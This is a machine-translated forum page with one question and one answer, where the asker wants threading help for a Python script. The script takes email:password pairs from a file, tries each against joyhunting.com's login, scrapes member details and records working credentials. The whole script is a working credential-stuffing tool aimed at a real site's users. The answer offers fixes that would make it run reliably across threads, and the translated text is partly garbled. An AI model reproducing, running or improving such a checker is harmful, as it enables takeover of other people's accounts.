python线程队列问题

时间:2010-10-01 04:35:34

标签: python multithreading queue

地狱全部。

我制作了一些带有线程的python脚本,检查某些网站中存在的一些帐户

如果我运行线程1,它运行良好,但如果增加线程,如3~5及以上,

与线程1相比,结果非常不同,我手动检查了

如果我增加线程结果不正确。

我认为我的一些线程代码必须调整或如何使用Queue模块?

任何人都可以建议或调整我的脚本?提前谢谢!

# -*- coding: cp949 -*-
import sys,os
import mechanize, urllib
import cookielib
import re
from BeautifulSoup import BeautifulSoup,BeautifulStoneSoup,Tag
import re,sys,os,mechanize,urllib,threading,time

# Maximum number of process to spawn at any one given time.
MAX_PROCS =5

maillist = "daum.txt"
threads = []
SAVEFILE = 'valid_joyhunt.txt'

# Threading class
class CheckMyThread ( threading.Thread ):
 llemail = ""
 llpassword = ""
 def __init__ ( self , lemail, lpassword):
  self.llemail = lemail
  self.llpassword = lpassword
  threading.Thread.__init__( self )
  pass

 def run ( self ):
  valid = []
  llemail = self.llemail
  llpassword = self.llpassword 
  try:
   params = urllib.urlencode({'userid':llemail, 'passwd':llpassword})
   rq = mechanize.Request("http://www.joyhunting.com/include/member/login_ok1.asp", params)
   rs = mechanize.urlopen(rq)
   data = rs.read()      
   logged_in = r'var _id'  in data                    #정상 로그인                           
   if logged_in :
       rq = mechanize.Request("http://www.joyhunting.com/myjoy/new_myjoy.asp")
       rs = mechanize.urlopen(rq)
       maindata = rs.read(50024)
       jun_member = r"준회원"
       save = open(SAVEFILE, 'a')
       for match in re.finditer(r'<td height="28" colspan="2" style="PADDING-left: 16px">현재 <strong>(.*?)</strong>', maindata):
        matched =  match.group(1)    
       for match2 in re.finditer(r"var _gd(.*?);", data):
        matched2 = match2.group(1)
        print '%s, %s' %(matched, matched2)  
        break
       rq1=mechanize.Request("http://www.joyhunting.com/webchat/applyweb/sendmessage_HPCK_step1.asp?reURL=1&myid="+llemail+"&ToID=undefined&hide=undefined")
       rs1=mechanize.urlopen(rq1)
       sendmsg= rs1.read()
       #print sendmsg       
       match3 = ''
       for match3 in re.finditer(r":'\+(.*?)\);", sendmsg):
        matched3 = match3.group(1)
        #print matched3
        print 'bad'
        break
       if match3 =='':
        save.write('%s, %s, %s:%s ' %(matched, matched2, llemail, llpassword + '\n'))
        save.close()      
        print '[+] Checking: %s:%s -> Good!' % (llemail, llpassword)                
   else:
    print '[-] Checking: %s:%s -> bad account!' % (llemail, llpassword)
    return 0              
  except:
   print '[!] Exception checking %s.' % (llemail)
   return 1
  return 0   
try:
 listhandle = open(maillist);
#Bail out if the file doesn't exist
except:
 print '[!] %s does not exist. Please create the file!' % (maillist) 
 exit (2)

#Loop through the file
for line in listhandle:
 #Parse the line
 try:
  details = line.split(':')
  email = details[0]
  password = details[1].replace('\n', '')

 #Throw an error and exit.
 except:
  print '[!] Parse Error in %s on line %n.' % (maillist, currline)
  exit

 #Run a while statement:
 if len(threads) < MAX_PROCS:
  #Fork out into another process
  print '[ ] Starting thread to check account %s.' % (email);
  thread = CheckMyThread(email, password)
  thread.start()
  threads.append(thread)

 else:
  #Wait for a thread to exit.
  gonext = 0
  while 1 == 1:
   i = 0
   #print '[ ] Checking for a thread to exit...'
   while i < len(threads):
    #print '[ ] %d' % (i)
    try: 
     if threads[i]:
      if not threads[i].isAlive():
       #print '[-] Thread %d is dead' % (i)
       threads.pop(i)
       print '[ ] Starting thread to check account %s.' % (email);
       thread = CheckMyThread(email, password)
       thread.start() 
       threads.append(thread)
       gonext = 1
       break
      else:
       #print '[+] Thread %d is still running' % (i)
       pass
     else:
      print '[ ] Crap.'; 
    except NameError:
     print '[ ] AWWW COME ON!!!!'
    i = i + 1 
   time.sleep(0.050);
   if gonext:
    break

1 个答案:

答案 0 :(得分:0)

请注明具体的结果是什么?

从我看来,代码所做的远不止验证帐户。

从我看到的,你是从多个线程附加到一个文件,我会说它不是线程安全的。

此外,AFAIK Mechanize对所有请求使用共享cookie存储,因此它们可能会产生干扰。在mechanize.Browser()内使用单独的run()代替mechanize.Request()

相关问题